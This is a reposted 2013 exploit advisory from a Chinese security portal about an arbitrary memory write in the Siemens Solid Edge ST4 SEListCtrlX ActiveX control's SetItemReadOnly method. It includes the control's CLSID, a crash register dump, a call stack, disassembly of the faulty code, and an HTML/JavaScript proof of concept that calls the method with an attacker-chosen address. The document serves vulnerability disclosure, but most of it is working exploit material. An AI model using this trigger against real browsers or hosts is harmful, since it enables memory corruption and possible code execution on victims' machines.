首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SIEMENS Solid Edge ST4 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Re
来源:vfocus.net 作者:rgod 发布时间:2013-05-27  
SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Control SetItemReadOnly 
Arbitrary Memory Rewrite Remote Code Execution Vulnerability
   
tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Internet Explorer 7/8
   
   
   
   
file tested: SolidEdgeV104ENGLISH_32Bit.exe
   
   
background:
   
the mentioned software installs an ActiveX control with
the following settings:
   
ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True
   
Vulnerability:
   
This control exposes the SetItemReadOnly() method, see typelib:
   
...
/* DISPID=14 */
    function SetItemReadOnly(
        /* VT_VARIANT [12]  */ $hItem,
        /* VT_BOOL [11]  */ $bReadOnly
        )
    {
    }
...
   
(i)
By setting to a memory address the first argument
and the second one to 'false' you can write a NULL
byte inside an arbitrary memory region.
   
(ii)
By setting to a memory address the first argument
and the second one to 'true' you can write a \x08
byte inside an arbitrary memory region.
   
Example crash:
   
EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
   
Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618
   
   
   
vulnerable code, inside the close control.dll:
...
;------------------------------------------------------------------------------
        Align   4
 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
        push    ebp
        mov ebp,esp
        mov eax,[ebp+08h]
        test    eax,eax
        jz  L1011D15C
        cmp dword ptr [ebp+0Ch],00000000h
        jz  L1011D158
        or  dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...
   
...
;------------------------------------------------------------------------------
 L1011D158:
        and dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here          
 L1011D15C:
        pop ebp
        retn    0008h
;------------------------------------------------------------------------------
...
   
As attachment, code to reproduce the crash.
   
   
   
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SIEMENS Solid Edge ST4 WebPart
·CompatUI ActiveX Control <= Re
·Show In Browser 0.0.3 Ruby Gem
·HP LaserJet Pro P1606dn Passwo
·SAS Integration Technologies C
·CodeBlocks 12.11 (Mac OS X) -
·Nginx HTTP Server 1.3.9-1.4.0
·IBM SPSS SamplePower C1Tab Act
·AdobeCollabSync Buffer Overflo
·Logic Print 2013 - Stack Overf
·Analysis of nginx 1.3.9/1.4.0
·Intrasrv Simple Web Server 1.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved